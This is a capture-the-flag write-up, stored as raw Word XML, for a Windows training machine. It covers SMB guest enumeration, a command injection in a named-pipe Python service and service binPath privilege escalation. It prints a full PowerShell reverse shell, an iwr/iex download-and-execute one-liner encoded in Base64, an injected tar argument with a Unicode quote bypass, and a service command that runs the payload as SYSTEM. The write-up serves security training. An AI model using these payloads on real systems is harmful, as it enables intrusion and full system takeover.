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heading=h.xgrkp4mr1pm6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d6qaeqlblmqs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Introduction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This write-up refers to the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New Year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machine. If support is required, please open a ticket in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId8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support channel on the Discord server.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pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:lineRule="auto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gux2ehf50igx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Reconnaissance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Initial enumeration of the machine was performed using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Nmap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to identify open ports and exposed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nmap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-Pn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-p-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--open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--min-rate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&lt;machine-ip&gt;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-vvv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89300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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Nmap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enumeration identified ports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135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(MSRPC),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139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(NetBIOS),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445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(SMB),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3389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(RDP), and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49669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(dynamic RPC) as open on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:spacing w:after="24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Using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smbclient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it was possible to enumerate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SMB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shares authenticated as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guest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user, without requiring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password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smbclient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//&lt;machine-ip&gt; -U guest -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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587500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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During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SMB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enumeration, a share named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share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was identified. A connection was established to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share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share, where the file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server.py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was found.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server.py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file was downloaded from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SMB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share to the local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016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smbclient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//&lt;machine-ip&gt;/share -U guest -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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server.py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11300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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  <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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server.py</w:t>
        </w:r>
      </w:hyperlink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File Content</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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Analysis of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server.py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file indicated that it is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Python 3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script that creates and manages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Windows Named Pipe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executing directly in system memory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D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win32pipe,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win32file,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pywintypes,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win32security,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win32con,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json,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requests,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subprocess,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PIPE_NAME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\\.\pipe\CustomNamedPipeScript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ProcessData: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__init__(self,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json.loads(self.data)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'action'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raise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Exception(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"Action not defined."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'args'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raise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Exception(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"Args not defined."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hasattr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(self,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'action'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getattr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(self,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'action'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])(data[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'args'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raise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Exception(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"Action not found."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3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"error"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f"Error: {e}"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A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3C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json.dumps(response)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download(self,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'url'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raise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Exception(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"URL not defined."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'compression'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raise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Exception(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"Filename not defined."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requests.get(data[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'url'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filename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'url'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].split(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'/'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filename_download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f"C:\\files_downloaded\\{filename}"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time.strftime(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"_%Y%m%d%H%M%S"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request.status_code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(filename_download,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'wb'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file.write(request.content)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subprocess.Popen([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"tar"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'compression'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f"{filename_download}.tar.gz"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filename_download])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  <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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f"File {filename} downloaded successfully."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054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  </w:t>
        <w:tab/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"error"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f"Error downloading file: {request.status_code}"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A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Exception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</w:t>
        <w:tab/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"error"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f"Error: {e}"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060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PipeServer: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create_pipe_with_permissions(self,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pipe_name):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security_descriptor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win32security.SECURITY_DESCRIPTOR()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security_descriptor.Initialize()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security_descriptor.SetSecurityDescriptorDacl(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6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everyone,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win32security.LookupAccountName(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"Everyone"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acl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win32security.ACL()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acl.AddAccessAllowedAce(win32security.ACL_REVISION,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win32con.GENERIC_ALL,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everyone)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security_descriptor.SetSecurityDescriptorDacl(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acl,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6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security_attributes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pywintypes.SECURITY_ATTRIBUTES()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security_attributes.SECURITY_DESCRIPTOR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security_descriptor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win32pipe.CreateNamedPipe(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pipe_name,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win32pipe.PIPE_ACCESS_DUPLEX,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win32pipe.PIPE_TYPE_MESSAGE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win32pipe.PIPE_WAIT,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65536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65536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security_attributes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handle_client(self,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pipe):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"Client connected."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result,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win32file.ReadFile(pipe,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1024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ProcessData(data.decode(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'utf-8'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)).run()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win32file.WriteFile(pipe,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response.encode(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'utf-8'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pywintypes.error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"Client disconnected."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finally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win32file.CloseHandle(pipe)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"Pipe closed."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server(self):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f"Creating named pipe: {PIPE_NAME}"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pipe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self.create_pipe_with_permissions(PIPE_NAME)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</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090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"Waiting for client to connect..."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win32pipe.ConnectNamedPipe(pipe,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self.handle_client(pipe)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Exception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f"Error: {e}"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__name__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"__main__"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PipeServer().server()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script also processes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JSON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data and performs requests to a provided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URL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D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If the received file is considered valid, it is compressed into </w:t>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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tar.gz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 format.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E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mhpih1rikoha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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.hcdc9m6gxz3b" w:id="4"/>
      <w:bookmarkEnd w:id="4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Exploitation – Obtaining the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user flag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line 50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of the script, a C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ommand Injection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vulnerability was identified.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A2">
      <w:pPr>
        <w:spacing w:after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value of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compression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key, received via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JSON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is concatenated directly into a call to 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24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">subprocess.Popen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allowing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arbitrary command execution on the operating system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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subprocess.Popen([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"tar"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'compression'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{filename_download}.tar.gz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filename_download])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222500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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 exploit this flaw, a script was developed to communicate with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Windows Named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Pipe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injecting commands through the vulnerable field and resulting in execution of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reverse shell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on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA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Initially,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script.ps1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(reverse shell)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file was hosted on a local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Python server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on port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80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B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hyperlink r:id="rId15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script.ps1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Delay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establishing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network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connection,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between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retries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Start-Sleep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-Seconds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Connect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try{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$TCPClient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New-Object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Net.Sockets.TCPClient(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'&lt;vpn-ip&gt;'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&lt;vpn-port&gt;)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until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($TCPClient.Connected)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$NetworkStream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$TCPClient.GetStream()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$StreamWriter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New-Object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IO.StreamWriter($NetworkStream)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Writes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WriteToStream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($String)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buffer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network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stream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read.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determined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TCP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recieve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buffer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65536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[byte[]]$script:Buffer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..$TCPClient.ReceiveBufferSize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Write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$StreamWriter.Write($String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'SHELL&gt; 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$StreamWriter.Flush()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Initial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output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also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creates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inital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byte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array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buffer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WriteToStream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Loop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breaks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NetworkStream.Read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throws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happen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connection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closed.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(($BytesRead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$NetworkStream.Read($Buffer,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$Buffer.Length))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-gt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command,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remove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byte/newline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$Command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([text.encoding]::UTF8).GetString($Buffer,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$BytesRead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C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Execute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command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output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(including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errors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thrown)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$Output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Invoke-Expression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$Command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&gt;&amp;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Out-String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$_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Out-String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Write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output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WriteToStream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($Output)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Closes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StreamWriter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underlying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TCPClient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$StreamWriter.Close()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Next,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iwr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command was used to request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script.ps1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from the server on port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80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executing it directly in memory using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iex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B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command was copied into </w:t>
      </w:r>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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CyberChef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where it was encoded to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UTF-16LE (1200)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and then B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ase64,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enabling execution via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PowerShell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DC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$x=iwr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-usebasicparsing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http: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//&lt;machine-ip&gt;/script.ps1; iex($x);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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JAB4AD0AaQB3AHIAIAAtAHUAcwBlAGIAYQBzAGkAYwBwAGEAcgBzAGkAbgBnACAAaAB0AHQAcAA6AC8ALwAxADAALgAwAC4ANQAuADEAMAA5AC8AcwBjAHIAaQBwAHQALgBwAHMAMQA7ACAAaQBlAHgAKAAkAHgAKQA7AA==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286000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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generated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Base64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payload was later used in the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exploitation script.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br w:type="textWrapping"/>
        <w:t xml:space="preserve">To ensure correct execution, it was necessary to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bypass Unicode filters.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The Command Injection vulnerability allows filter bypass using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Unicode characters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specifically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Unicode quotes (FF02)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which evade parsing restrictions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E4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Technical references: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0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId18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https://worst.fit/worstfit/Arg-Splitting/tar/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240" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId19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https://blog.orange.tw/posts/2025-01-worstfit-unveiling-hidden-transformers-in-windows-ansi/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These references describe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argument splitting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techniques and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Unicode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abuse for validation evasion on Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E9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win32file,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PIPE_NAME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\\&lt;machine-ip&gt;\pipe\CustomNamedPipeScript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Substitua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pelo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hostname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servidor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client():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print(f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Connecting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named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pipe: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{PIPE_NAME}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")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F1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  <w:tab/>
        <w:t xml:space="preserve">handle = win32file.CreateFile(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F2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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">PIPE_NAME,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F3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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">win32file.GENERIC_READ | win32file.GENERIC_WRITE,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F4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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0, None, win32file.OPEN_EXISTING, 0, None</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F5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  <w:tab/>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F6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  <w:tab/>
        <w:t xml:space="preserve">message = json.dumps({</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F8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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">'action': 'download',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F9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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">'args': {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FA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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">'url': 'http://&lt;machine-ip&gt;:9090/file.txt',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FB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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">'compression': '--use-compress-program=powershell /enc &lt;base64&gt;\uFF02 \uFF02-zcvf' #Substitua pelo base64 gerado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FC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0FD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  <w:tab/>
        <w:t xml:space="preserve">})</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FE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  <w:tab/>
        <w:t xml:space="preserve">print(f"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Sending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{message}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")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000100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  <w:tab/>
        <w:t xml:space="preserve">win32file.WriteFile(handle, message.encode('utf-8'))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000101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  <w:tab/>
        <w:t xml:space="preserve">result, response = win32file.ReadFile(handle, 1024)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000103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  <w:tab/>
        <w:t xml:space="preserve">print(f"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Received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response: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{response.decode(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'utf-8'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)}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")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000104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  <w:tab/>
        <w:t xml:space="preserve">win32file.CloseHandle(handle)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000106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ab/>
        <w:t xml:space="preserve">except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000107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  <w:tab/>
        <w:t xml:space="preserve">print(f"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Error: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{e}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")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000108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 __name__ == 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__main__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client()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276600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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Next, a Python 3 server was started on port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80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to host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reverse shell.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http.server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749300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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second port,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9090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was used exclusively to host a valid file (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file.txt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) required for exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000116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http.server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9090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800100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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Finally,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exploit script teste.py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was executed, resulting in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reverse shell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on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011E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\\&lt;machine-ip&gt;\IPC$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/u:guest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teste.py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143000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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Connections were successfully established on ports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80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9090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with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reverse shell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received on port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443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6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673100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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685800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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With the reverse shell established, access was obtained as the application user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john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4127500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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0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user flag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is located at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C:\Users\john\Desktop.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000131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616200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.8aql43pyoofa" w:id="5"/>
      <w:bookmarkEnd w:id="5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Privilege Escalation – Obtaining the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root flag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Using the following command, all services on the machine were enumerated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000136">
      <w:pPr>
        <w:spacing w:after="24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During analysis, a service located outside the default path, directly under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C:\Program Files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was identified.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'reg query HKLM\SYSTEM\CurrentControlSet\Services /v ImagePath /s | findstr /i /v "system32 drivers windows"'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ForEach-Object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($_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-match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"Services\\(.+)"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$matches[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$test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"sc query $n 2&gt;&amp;1"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($test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-notmatch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"Access is denied"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Write-Host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"[+] SERVICE FOUND: $n"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-ForegroundColor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Green;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"sc qc $n | findstr BINARY_PATH_NAME"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78000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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before="24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It was confirmed that the user has permission to stop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DownloaderServer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service.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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sc.exe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stop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DownloaderServer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25500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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Since the user could modify the service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binPath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arbitrary command execution via the service became possible, resulting in execution as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NT AUTHORITY\SYSTEM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43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Subsequently, it was confirmed that the user has permission to modify the service's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binPath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"sc config DownloaderServer binPath= ""teste"""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cmd.exe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"sc qc DownloaderServer"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727200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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a result, it was possible to change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binPath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execute a command that performs a request to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 80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controlled by the attacker and, subsequently, execute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reverse shell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the exploitation to be successful, it was necessary to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restart the service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ensuring the application of the modifications and the execution of the configured command.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"sc config DownloaderServer binPath= ""C:\Windows\System32\cmd.exe /c powershell /enc &lt;base64&gt;"""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Substitua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pelo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base64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gerado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anteriormente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"sc start DownloaderServer"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159000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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533400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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request to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script.ps1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was received again on port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80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confirming execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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825500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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Next, a reverse shell was then received with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NT AUTHORITY\SYSTEM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privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015A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927100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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root flag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is located at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C:\Users\Administrator\Desktop.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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625600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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sectPr>
      <w:headerReference r:id="rId36" w:type="default"/>
      <w:headerReference r:id="rId37" w:type="first"/>
      <w:headerReference r:id="rId38" w:type="even"/>
      <w:footerReference r:id="rId39" w:type="default"/>
      <w:footerReference r:id="rId40" w:type="first"/>
      <w:footerReference r:id="rId41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8">
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18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2025 Hacking Club | All rights reserved</w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">                                           Page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2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3">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.om5nphop57lo" w:id="6"/>
    <w:bookmarkEnd w:id="6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-866770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65" name="image12.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image12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64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5">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:pict>
        <v:shape id="WordPictureWatermark1" style="position:absolute;width:617.76pt;height:793.4866141732284pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:absolute;margin-left:-73.98425196850394pt;mso-position-vertical-relative:margin;mso-position-vertical:absolute;margin-top:-1.2459055118110236pt;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId2" o:title="image3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6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-942970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74" name="image15.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image15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-344480</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5771833</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6686550" cy="3015679"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="56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New Year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-344480</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5771833</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6686550" cy="3015679"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="56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86550" cy="301567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2" style="position:absolute;width:617.76pt;height:793.4866141732284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3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footer" Target="footer2.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId27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9.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackingclub.com/training/training-machines/230" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tar.gz" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://server.py" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/martinsohn/PowerShell-reverse-shell/refs/heads/main/powershell-reverse-shell.ps1" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId16" 